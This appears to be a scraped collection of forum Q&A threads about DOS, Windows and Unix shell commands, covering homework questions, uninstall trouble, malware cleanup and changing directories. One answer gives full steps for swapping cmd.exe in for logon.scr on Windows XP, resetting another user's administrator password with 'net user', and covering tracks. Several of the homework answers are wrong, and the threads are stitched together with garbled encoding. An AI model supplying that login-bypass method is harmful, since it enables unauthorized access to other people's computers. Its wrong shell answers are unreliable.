School Homework. thanks in advance?

Answer the following questions as briefly (but completely) as possible. Unless otherwise stated, assume a POSIX shell (such as bash) is used.

1.Using wild cards, frame a pattern where the first character is alphabetic and the last is not numeric.

2.How do you remove a file beginning with a hyphen in the $HOME/foo directory?

3.What happens when you use cat foo %26gt; foo? What about sort -f foo %26lt; foo

4.What is a filter command? Where does a filter get its input from?

5.What are two consequences of using double quotes?

6.What are two environment variables are set by reading /etc/passwd when you login? (Actually there are 4.)

7.How would you add the current directory (no matter what it is) to you existing PATH? Why would that be a bad idea?

8.If you run PS1=%26#039;\!$%26#039;, what sort of prompt will you get using the Korn shell or bash?

9.Write a Korn or bash shell alias to list only the hidden files of the current directory. (Extra credit if your alias doesn%26#039;t list . or .. entries.)

10.You have just used the command tar -cvf /dev/fd0 *.sh. How can you repeat the command to use *.pl files instead of *.sh files, in the bash shell, without retyping the entire command?

11.If your .profile contains statements like PATH=$PATH:$HOME/bin and PS1=%26#039;$PWD$ %26#039; and you make any changes to the file, how should you activate the changes?|||1.Using wild cards, frame a pattern where the first character is alphabetic and the last is not numeric.

^[a-zA-Z]*[a-zA-Z]$

2.How do you remove a file beginning with a hyphen in the $HOME/foo directory?

rm $HOME/foo/\-*

3.What happens when you use cat foo %26gt; foo? What about sort -f foo %26lt; foo

cat foo %26gt; foo: foo will be a file size 0. Empty file.

sort -f foo %26lt; foo: foo will be a file size 0. Empty file.

4.What is a filter command? Where does a filter get its input from?

Filter is a concept of excluding/including certain info from the original output. Input is from an output of another command.

5.What are two consequences of using double quotes?

GROUP

7.How would you add the current directory (no matter what it is) to you existing PATH? Why would that be a bad idea?

export PATH=$PATH:`pwd`

Bad idea: Every time you do a cd, your path will keep expanding.

8.If you run PS1=%26#039;\!$%26#039;, what sort of prompt will you get using the Korn shell or bash?

My guess is last command you ran.

9.Write a Korn or bash shell alias to list only the hidden files of the current directory. (Extra credit if your alias doesn%26#039;t list . or .. entries.)

alias ls=`/bin/ls | grep ^\. | grep -v \. | grep -v \.\.`

10.You have just used the command tar -cvf /dev/fd0 *.sh. How can you repeat the command to use *.pl files instead of *.sh files, in the bash shell, without retyping the entire command?

use up arrow key, two backspaces and type sh.

if you set the vi editor, you can use %26quot;k$llRpl%26quot; and enter

11.If your .profile contains statements like PATH=$PATH:$HOME/bin and PS1=%26#039;$PWD$ %26#039; and you make any changes to the file, how should you activate the changes?

%26quot;. $HOME/.profile%26quot; (no quotes) or if .profile is set to have %26#039;x%26#039; flag for owner, just $HOME/.profile will do

All these questions can be easily solved by trying it yourself on the unix shell. All of the answers are from memory. do not have a handy machine with *nix loaded to validate the answers. How can I uninstall a program called softkey smash Win95 100?

I just got this game (it%26#039;s a win 95 game) for my computer. I currently have windows vista, and now I cannot uninstall the game. I tried their telephone number and website, but both are no longer in service. I am just wanting to get rid of the thing, it was all these trial games, and nothing worth keeping.

Here is the README:

**************************************鈥?br>

SMASH100.EXE is not shareware or freeware. By purchasing

this CDROM, you have been granted a license to use the

program with this disk. This software is provided

on an %26quot;AS-IS%26quot; basis. Softkey will not make any

warranties or have any liabliity as to the software%26#039;s

operation or the results it produces or fails to produce.

I.Installation Problems.

(All references to C: refer to the drive where windows

is installed. D: refers to your CDROM drive)

1) SMASH100 is written using Microsoft(R) Visual Basic(tm) v3.0.

Microsoft(R) and other Visual Basic(tm) custom control (VBX) makers

insist that to preserve the license of these controls

they be installed in the Windows\System directory. Many

shareware or other programs do not follow these guidelines

and hence are in violation of the distribution agreements for

these controls. In addition, they cause problems for those

who do follow the rules. In order to maintain the license

agreement, SMASH100 installs the Visual Basic controls from

each of the programs included on this CD ROM to the

Windows\System directory during the setup of SMASH100.

If during installation or operation of the SMASH100 program

you encounter %26quot;cannot copy%26quot;, %26quot;Invalid property%26quot;, or %26quot;Invalid

file format%26quot; messages or any other problems, please perform

the following steps.

1. Exit Windows

2. At the DOS prompt enter the following commands:

copy c:\windows\*.vbx c:\windows\system

erase c:\windows\*.vbx

3. (optional) type: dir c:\*.vbx /s /p

Locate all vbx files and copy them to the windows\system

directory then delete them from the original location.

4. Restart windows and reinstall the Softkey 100 Smash Windows

Games CDROM by choosing

file/run from Program Manager or File Manager and type d:\setup

In addition, some programs copy VBRUN300.DLL and other VBX files to

other areas besides Windows\System directory. It is advisable to

search your entire machine for VBRUN300.DLL and delete any occurance not

in your windows\system directory before installing Softkey 100 Smash

Windows Games.

This can be done by using the FileManager%26#039;s search under File\Search.

2) In the unlikely event that the setup routine fails, manual installation

can be done by the following instructions: [Remember, this is ONLY as

a last resort, and should not be done until ALL other options have

been tried and have failed.]

1. EXIT WINDOWS

2. At the dos prompt ( C:\%26gt; ) type:

C:\%26gt; CD \

C:\%26gt; MD \SMASH100

C:\%26gt; COPY D:\SMASH100\*.* C:\SMASH100

C:\%26gt; COPY D:\SMASH100\SYSTEM\*.* C:\WINDOWS\SYSTEM

C:\%26gt; COPY D:\SMASH100\SMASH100.INI C:\WINDOWS

C:\%26gt; COPY D:\SMASH100\SMASH100.HLP C:\WINDOWS

3. If your CDROM drive is not %26quot;D:%26quot; then edit the SMASH100.INI and

change the line %26quot;Path=D:\%26quot; replacing D: with your drive

i.e. %26quot;Path=E:\%26quot;

C:\%26gt; EDIT C:\WINDOWS\SMASH100.INI

4. Restart Windows and create a Smash 100 group and

icon in Progam

Manager by following the instructions below:

1. From the Program Manager menu, select File then New

2. Select Program Group option and click Ok.

3. In the Group Name type: Smash 100

4. Click Ok to create the group.

5. From the Program Manager menu, select File then New

6. Select Program Item option and click Ok.

7. In Description, type: Softkey 100 Smash Windows Games

8. In Command Line, type: C:\SMASH100\SMASH100.EXE

9. In Working Directory, type: C:\SMASH100

10. Click OK to create the Icon.

5. If you have further problems, please read the notes above.

3) DISK SPACE - SMASH100 takes up less than 1 megabyte of hard disk when

installed on your computer. During installation, Setup.exe copies

about 500K of files to a temporary directory. These files are

required to install SMASH100 but are deleted after the setup is

finished. It can require 2.5 megabytes to install. If you get the

message that you do not have enough free space to install SMASH100,

move some files to a floppy or decrease the size of your swap file

until you have completed the installation then you can put them back.|||Too complicated, try Perfect Uninstaller and everything goes easy.

To all who know about cmd.exe-how owuld i do this?

what commands would i replace with the originals listed, if i wanted to delete some files...n stuff

1.) First if you have another account other than the system administrator and you can bring up the Windows command Shell which is cmd.exe then your ready.

2.) To open cmd.exe just click on the Start button and click RUN

type cmd.exe once you%26#039;ve done that then your in.

3.) go to the system root directory by typing %26quot;cd\%26quot; without the quotes, next type %26quot;cd\windows\system32\%26quot; OR %26quot;cd\winnt\system32%26quot;

depending on where the Windows [stuff] are located.

4.) once you see system32 at the end of the command line. (warning! here comes the hard part).

5.) start by typing %26quot;mkdir tempdir%26quot; without the qoutes press enter

next type %26quot;copy logon.scr tempdir\logon.scr%26quot; also %26quot;copy cmd.exe tempdir\cmd.exe%26quot; again no quotes, press enter after each line

(type help to understand what you are doing)

6.) next %26quot;del logon.scr%26quot; deletes original logon.scr

7.) next %26quot;rename cmd.exe logon.scr%26quot; renames cmd.exe to logon.scr

8.)%26quot;exit%26quot; quits dos

9.)Now what you have just done is told the computer to backup the command program

and the screen saver file, then edits the settings so when the machine boots the

screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

%26quot;net user %26lt;admin account name here%26gt; password%26quot;

If the Administrator Account is called Frank and you want the password *SHEET* enter this

%26quot;net user Frank SHEET%26quot;

10.) and this changes the password on franks machine to *SHEET* and your in.

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

11.) Now log off the machine, logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to

C:\%26gt; net user administrator %26lt;newpassword%26gt;

and then log in with the new account.

Try this, might work, as long as he didn%26#039;t change default permissions on C:\winnt and C:\winnt\system32 you should be golden.|||What exactly is it you are wanting to delete that you can%26#039;t do with good old windows explorer?|||you going to mess you computer up if you don%26#039;t know what your doing.

I'm unable to log into Windows XP after certain Viruses/Trojans infected my computer. Please help!?

A couple of windows popped up and installed SMSS32.EXE, HELPER32.EXE, 41.EXE %26amp; IS15.EXE into my system32 directory. They blocked the task manager from opening, displayed a red circle with an X in it next to the Windows clock and changed the desktop to green with a virus alert of sorts written in the center. I went into MSCONFIG and found SMSS32.EXE in the startup list and disabled it. Then I went to restart Windows and while usually Windows does not display a logon screen, since there%26#039;s only one account, it did display one this time. I clicked on the account to log on. It sais %26quot;loading settings%26quot; but then, instead of going to Windows, the screen refreshed and it then said %26quot;saving settings%26quot; as though I just logged out again. So I%26#039;m guessing whatever malware I have is blocking logons.

Well, I ran Recovery Console from XP CD, went to the command prompt and deleted all the files listen above from the system32 directory. I had hoped that as a result I%26#039;d be able to log in and fix my computer with the info I found online (from a different computer). But I still can%26#039;t get past the logon screen.

Big problem with UXtheme.dll?

Hi, I wanted to change my vista theme to a different one, so I followed the guide on win matrix. Really tough virus...need hosts file help.?

So I got a horrible virus about 2 months ago and I was able to remove all of it. Now the problem is with my hosts file. It%26#039;s not in my etc folder. I have show hidden files on, but it%26#039;s still not there. If I run notepad as admin I can navigate to my etc folder, manually type %26quot;hosts%26quot;, and get it to open. I see that google, yahoo, and every other search engine you can think of has been redirected. If I try to save it, it says that it cannot be made and to check the path. If I save it as a text file, then remove the extension it will say that a file with name already exists and makes the name %26quot;Hosts (2).%26quot;

Obviously there has to be the file already there, but when I open the command prompt (as admin) and try to delete the file there it says it can%26#039;t be found(and yes I had the directory right and I typed everything correctly)

Microsoft's Windows XP Spyware?

am hoping to start a discussion about the ntuser.dat file in XP. This would be located in the C:\Documents and Settings\username directory. It%26#039;s a file that is supposed to maintain the registry settings. However it can grow to tremendous sizes. It continues to grow even if you do not change the registry. Being the curious type, I had to find out what is in this file. I tried opening it using FileAlyzer (from the makers of Spybot) but it would not open as it was being used by another process.

What I had to do was create a new user account for myself with admin privileges. At this point I noticed the ntuser.dat file in the new account is only a few hundred kilobytes in size. Then I began the process of deleting my original user account. During the user account deletion process, you are prompted whether to delete all of the users files or to save them. I chose to save them. The user account was gone, but the subdirectory was still present in the C:\Documents and Settings folder. Directories such as Application Data, Cookies, User Data, WINDOWS, etc were still there. But more importantly, the ntuser.dat file was still present. It had grown to over 5MB. I tried opening the file with FileAlyzer but it wouldn%26#039;t open. Even though the user account was gone, the file was still locked by another process!!

To take care of this I had to restart my computer and enter %26quot;Safe Mode with Command Prompt%26quot; in the Administrator account. Using DOS commands I was able to unhide ntuser.dat and then rename it ntuser.txt. After restarting the computer I was able to open the file with FileAlyzer.

I found listings for such things as keys pressed, windows opened, window sizes, resizing of windows, scrolling positions, addresses, files opened, files saved, registry changes made, programs opened, links, etc. I am not sure if all keys pressed are retained in the file (such as typing an email or a notepad document). In FileAlyzer, strings are in a left frame and are very brief. Double-clicking on a string takes you to its location in the right frame, which shows both the hex dump and text. However, a good portion of the text was coded as if you opened an executable in Notepad. But program names and file names were easily read. I have read elsewhere that this file also stores such information as passwords, form data, etc. In essence, the file contains a complete account of what I had done on the computer since I started using Windows XP.

I%26#039;m just wondering how others feel about this type of recordkeeping being done by Microsoft without the knowledge of the user, and if anyone has any other information about how this file is used by the operating system.|||Wow. I don%26#039;t know much about the registry, but that was some good research. I%26#039;d like to hear what M$ has to say about that.

Edit to answerer #2...

a) paranoia is a moot point if your comp is keylogging every stroke since day 1.

b) it doesn%26#039;t look like a standard cleaner like CCleaner, Gould or ATF Cleaner cleans ntuser.dat (But as I said I don%26#039;t know a lot about the registry, so I could be wrong there.)

c) any mention of a firewall is irrelevant to this question. The point being that MS is making the user vulnerable by storing this info without our knowledge to begin with. If it wasn%26#039;t there (or if we could get rid of it) we wouldn%26#039;t need to worry about it getting out.

How the heck do you load a game on DOSbox??? I%26#039;ve tried following directions that look like this:

DOSBox will give you a text prompt where you enter commands.

Now, find the directory containing the game you want to play. For example, lets say the game is in C:\myoldgame

In DOSBox, type:

mount c c:\myoldgame\

This will set the c:\myoldgame directory as the C drive in DOSBox.

Now, in DOSBox, type C:

This will change the directory to your game directory.

You can type dir to get a list of the files.

Your game should have a .exe executable file. Type that file in DOSBox and it will run your program.

HOW DO I FIX MY COMPUTER? ...bootmgr is missing...please help?

Okay, I am trying to fix a laptop with the %26quot;BootMGR is missing%26quot; problem. Well, I am trying to run the vista recovery disk, I click on repair your computer. I get to the window that says %26quot;system recovery options%26quot; where it tells you to select your operating system. Well, the problem is...there is never any operating systems in the list. If I just click next, i cannot use any of the repair tools, because it says x://source where it should say c://. So anyways, here is my question. If I want to load my driver, because I know there is no problem with my hardware, what is the file name for the windows vista operating system? Or how do I go about finding it manually by browsing through my files? Can I do it this way? PLease help me %26amp; thanks!

-UPDATE-

okay, I changed my directory, and executed the commands: bootrec.exe /Fixboot %26amp; bootrec.exe. /Fixmbr. They were both successful it said. I then, could use the tools on the repair disk. I did the startup repair tool and this is what i came up with:

Questions about C++ commands?

How do I use the command that in command prompt is: %26quot;CD C:\%26quot; in C++? I know it should be system(%26quot;CD C:\%26quot;) but it gets confused due to the backslash. So I put two backslashes but then it skips that command. How do I successfully change the directory to C:\ in C++?|||Hm....

Unlike Linux or UNIX, DOS using backslash as path driver.

Remember, C/C++ used \ as special char. I u want to use this char, use with double backslash

Ex:

string strcmd =%26quot;CD C:\\MYPATH%26quot;;|||I answered this question the last time you asked.|||The are two possible ways the above code don work

1. You Compile and Run the Code the System(); in the IDE itself

2. You are in the C:\ directory and you want to change from c:\ to say D:\ using cd d:\

In the first case all you have to do is compile the program and don run in the program in The IDE (TC or Visual Studio)itself ... Exit the IDE and double click your compiled exe or go to dos and type the exe name without exe

The Reason you cant run it in your IDE is that when ever you run a process in dos the control gets transferred to the running process which will overwrite the DOS memory in the RAM by doing so disabling sme part of DOS including all you commands such as cd mkdir which are overwrittem ....at the end of the execution its returned to the original state by set of interrupts... This was due to the 640KB barrier....

in second Case

if you are in C:\ directory say C;\documents and settings\some folder

a cd C:\ Should work A ok ... But if you try a CD D:\ will never work it used to in older version of dos ..... if you want to navigate to other D:\ just do a system(D:) without quotes or anything.......

How do I run a C program? I tried everything I know?

Hello, I am getting back into programming and I am having trouble running my C program. Ok here%26#039;s what I%26#039;ve done so far:

downloaded Dev-C++ compiler

made a file called (helloworld.c)

clicked on compile and run in the compiler

it created the helloworld.o file and the helloworld.exe file

now when I double clicked the .exe file from my directory it did nothing, I even tried to execute from the command prompt by changing the directory to the one I created for my new program and typed (start helloworld.exe), it did absolutely nothing.]\

Im stuck, can anybody help?|||The program is running and the window is closing before you can see it. Put something at the end of your program to make the program pause befor exiting, e.g. wait for the user to hit return:

#include %26lt;stdio.h%26gt;

int main(void)

{

....printf(%26quot;Hello world!\n%26quot;);

....printf(%26quot;Hit return to continue...!\n%26quot;);

....getch();

....return 0;

}|||How about %26quot;Build and Run%26quot;?|||OK so here we go:

So I%26#039;m assuming from your question that the program compiled ok and that it created an executable file (.exe). Right?

So I have one solution:

You went to the programs directory and double clicked it. Did the Console (the black screen) come in a then just dissapear.

If that is happening this is what is happening:

Your program is executing so fast you have no time to see it

Here%26#039;s what you do:

Add this statement to the end of your code, before the return 0:

system(%26quot;pause%26quot;);

This causes your program to wait for user input (pressing a key) before terminating.

Hope this helps!

dir /p

Most people don%26#039;t bother anymore since the other is faster and easier (more user friendly). ALSO, the GUI prevents you from making a boo-boo and messing up your system so that it won%26#039;t run, something DOS does NOT do.

In Windows Vista, how can one get a text copy of a folder directory that is not on a hard drive?

Being an old time computer user, anytime I needed a text list of a directory, I would drop into the black Command Prompt, change (CD ) to the directory I wanted and DIR *.* %26gt; file.txt While the Command Prompt is there in Vista and works this way, it does not seem to provide any way to get to Public or Computer and thus get a list.

Using Prnt Scrn provides a graphic image of the screen and eventually we did an OCR on the image and got our list after doing some clean up of errors.

Files does not offer the option of printing the list while in Explorer and of course Copy or Send to sends the files, not the listing.

%26quot;cd [dirname]%26quot; takes you to that directory. To go to straight to c just type %26quot;cd c:\%26quot;. %26quot;dir%26quot; will list the contents of the current directory.

For more info on each, type in %26quot;help cd%26quot; or %26quot;help dir%26quot;.|||right click the command prompt and click on run as and then just click ok ... that should work|||cd is the command to change directories.

How can I access my flash drive in command prompt?

I%26#039;m using a computer with Vista, and the flash drive itself works fine in regular Windows Explorer, but I want to use command prompt to compile source code I have on it. My flash drive is assigned F:, but when i type in

cd F:\java

it just shows the name of the directory I was already in and seems to ignore my command. How can I get it to change directories to the F: drive?|||The %26quot;cd%26quot; command only moves you between directories (folders) on the same drive

To access a different drive just type in the drive letter without the %26quot;cd%26quot; command: %26quot;F:%26quot;

It should then move to the F drive

Then use the cd command to go to the java folder: %26quot;cd java%26quot;|||Enter %26quot;F:%26quot; by itself to switch the default drive to %26quot;F:%26quot;.

After that, you can enter %26quot;cd \java%26quot; to access the %26quot;\java%26quot; directory.

Something I dont quite understand regarding the cmd prompt?

I am following instructions and I dont understand this - %26quot;Open a command prompt and change directory (cd) to

%26quot;C:\Games\MAX-FX Tools\RasMaker%26quot;%26quot;

Now, I know how to get into the command prompt, but its in E:, I dont understand how to change the directory, anyone help?

|||cd e:

This will change directory to the e drive.

Then: find Games\MAX-FX Tools\RasMaker

I think - it%26#039;s been 15 years...

-MM|||type in cd C:\Games\MAX-FX Tools\RasMaker

just like that|||have you tried literally typing in %26quot;cd C:\Games\Max-FX Tools\RasMaker%26quot; (no actual quotations marks)! |||with the command prompt open, type:

%26quot;e:%26quot;

notice the colon.

and press enter. That will change the drive you are browsing from c to e. Unless you mean the prompt it already in e, in which case, just type %26quot;c:%26quot; to get back to c. Ater that from there, you would just type:

%26quot;cd .\Games\MAX-FX Tools\RasMaker%26quot;

or whatever the folder it is in is called. The .\ at the beginning ensures that you will be changing directories from the root of the drive, in case the prompt is in some other folder.|||You%26#039;ll use two commands, both without the quotes.

First: %26quot;C:\%26quot;

Then: %26quot;cd Games\MAX-FX Tools\RasMaker%26quot;|||Sometimes depending ont he how you boot the cd rom letter can change so make sure the cd rom is actually E:.

Than just type %26quot;E:%26quot; and hit enter at the command prompt. If the cd drive or any drive for that matter is E: and recognized the command prompt should change to %26quot;E:%26quot; Otherwise there will be invalid command notice.

after %26quot;E:\%26quot; is there than just type in the directory the file is in folder by folder tot he file. If you know exactly where the file is than you can just type all the directory at one time instead of setting command to drive %26quot;E:\%26quot; first. Good luck.

I have two volumes in my Computer. C: and V:. When I open the Command Prompt, the directory is C:\Users (cont)?

the command cd\v: doesn%26#039;t work as expected!|||%26quot;cd\v: doesn%26#039;t work as expected%26quot;

The problem is that you are apparently %26quot;expecting%26quot; to change drives with a %26quot;change directory%26quot; command!

Just type %26quot;v:%26quot; at the c:\ prompt and it will change to v:\

Good luck!|||Just type V:|||c: and v: are diffrent drives, you cannot cd betwen them.

Just type v: to change to the v: drive

The NT versions have a different command prompt program, which attempts to resolve the potential security issues with MS-DOS. NT versions of windows include NT4, 2000, XP, Vista.
